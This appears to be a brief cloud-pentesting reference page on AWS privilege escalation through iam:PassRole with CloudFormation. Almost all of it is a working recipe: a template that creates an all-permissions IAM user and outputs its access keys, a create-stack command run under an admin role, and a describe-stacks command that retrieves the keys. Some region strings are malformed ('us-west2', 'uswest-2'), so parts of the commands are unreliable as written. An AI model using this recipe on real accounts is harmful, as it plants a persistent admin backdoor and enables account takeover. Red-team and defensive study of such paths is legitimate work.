iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Reading time: 2 minutes

An attacker could for example use a cloudformation template that generates keys for an admin user like:

{
  "Resources": {
    "AdminUser": {
      "Type": "AWS::IAM::User"
    },
    "AdminPolicy": {
      "Type": "AWS::IAM::ManagedPolicy",
      "Properties": {
        "Description": "This policy allows all actions on all resources.",
        "PolicyDocument": {
          "Version": "2012-10-17",
          "Statement": [
            {
              "Effect": "Allow",
              "Action": ["*"],
              "Resource": "*"
            }
          ]
        },
        "Users": [
          {
            "Ref": "AdminUser"
          }
        ]
      }
    },
    "MyUserKeys": {
      "Type": "AWS::IAM::AccessKey",
      "Properties": {
        "UserName": {
          "Ref": "AdminUser"
        }
      }
    }
  },
  "Outputs": {
    "AccessKey": {
      "Value": {
        "Ref": "MyUserKeys"
      },
      "Description": "Access Key ID of Admin User"
    },
    "SecretKey": {
      "Value": {
        "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
      },
      "Description": "Secret Key of Admin User"
    }
  }
}

Then generate the cloudformation stack:

aws cloudformation create-stack --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::[REDACTED]:role/adminaccess \
    --capabilities CAPABILITY_IAM --region us-west-2

Wait for a couple of minutes for the stack to be generated and then get the output of the stack where the credentials are stored:

aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region uswest-2

References

• https://bishopfox.com/blog/privilege-escalation-in-aws